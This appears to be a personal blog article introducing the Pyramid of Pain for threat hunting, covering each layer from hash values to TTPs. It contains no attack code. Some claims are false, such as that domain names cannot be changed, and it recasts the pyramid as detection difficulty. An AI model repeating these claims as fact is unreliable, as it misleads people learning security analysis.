Pyramid of Pain —

Today there many strategic advancements brought in the defensive mechanisms of Corporate Security and their overall tech-infra. Yet, there are a lot of challenges faced when it comes to safeguarding of organization’s assets from the emerging threats. The Pyramid of Pain was introduced by David J Bianco for demonstrating the level of difficulty in terms of tracking the adversaries and understanding the threat impact.

Below diagram demonstrates the Pyramid of Pain -

From the above diagram we can understand that each level represents different types of attack indicators that we may use as a Security Analyst during the Threat Hunting process to detect an adversary.

Adversary — Opponent/ Threat Actor — a great example — Batman VS Joker (Adversary)

Let's break down each layer of pyramid -

Trivial | Hash Values — For example an adversary is trying to compromise an endpoint using some type of malware, your first base step as a Threat Hunter would be to look for the hash of the process running and check that hash value against Anti Viruses. Considering the fact that adversaries are smart, they may obfuscate the malware to make its execution and detection more sophisticated. In that case too, you would use the hash value and compare it with various Threat Intel Feeds to know more about that malicious process.

As we move above and climb the pyramid, the level of difficulty to detect an adversary also increases. Now let us consider the next layer.

Easy | IP Address — There are already restrictions made inside an organization’s network hierarchy defining the ranges or sensitive set of IPs and their access to organization’s different operating levels. Moreover, in combination of SIEM and Threat Intel feeds integrated together, one can easily fetch the list of Bad IPs from these feeds and create a custom rule if any of their endpoints may contact any of those IP’s and at times a filter is also added to blacklist those Bad IP’s and block communication with them.

Simple | Domain Names — As we reach this level, things often go difficult to deal with. Unlike hash values and IP blacklisting, domain names cannot be changed or tampered in any way. So, the methodologies for detecting abnormalities at this layer goes restricted and limited. Yet some solutions like, analyzing the Web Server logs or fetching proxy logs into Event Trackers may help to detect some malicious artifacts.

Annoying | Network/Host Artifacts — These are indicators caused due to malicious activities performed by adversaries on Network or one or more Hosts. Network artifacts such as URL patterns or tampering of User Agents or modification in Registry values are some examples. Here a continuous and tactical monitoring is needed to detect the adversary traces. Host artifacts focuses on Hosts/Critical Endpoints which are targeted. Malicious use of PowerShell or using a legit process name to execute a malware are some examples for the same. A deep understanding and analysis is needed to uncover such adversarial movements.

Challenging | Tools — these are tools used by adversaries to execute the attack. Some examples may include — A multi phased Spear Phishing attack with malware embedded PDF attachments sent over email to disguise end users, pass the hash or credential dumping activities. In depth knowledge and expertise is required to uncover and analyze such traces.

Tough | TTPs -

TTP — Tactics, Techniques & Procedures

It refers to the TTPs used by an adversary in almost all stages of evading the defense mechanism. Starting from Recon including stages like Privilege Escalation, Lateral Movements, causing a lethal impact and completely disrupting the network — at all these stages there are numerous TTPs that an adversary may choose to penetrate in your organization. The reason of being this layer at the top is due to the nature of its diversity and complexity. It's really difficult to be fully up to date on latest TTPs and different adversarial behaviors on those specific TTPs. Here, regardless of at what level you may operate, general understanding of adversaries and their associated TTPs is must.

In order to work on the top and the hardest layer — That is where MITRE ATT&CK Framework plays an extremely important role.

OH wait!! Did I mention about MITRE ATT&CK? Ahh! Stay Tuned for the next article wherein I will explain about ATT&CK

• PS: Don’t expect me to write everything in one article 😆! Thanks for reading this article, let me know your doubts and suggestions. Show some love by smashing the 👍 button and share it in your network.

Urvesh Thakkar,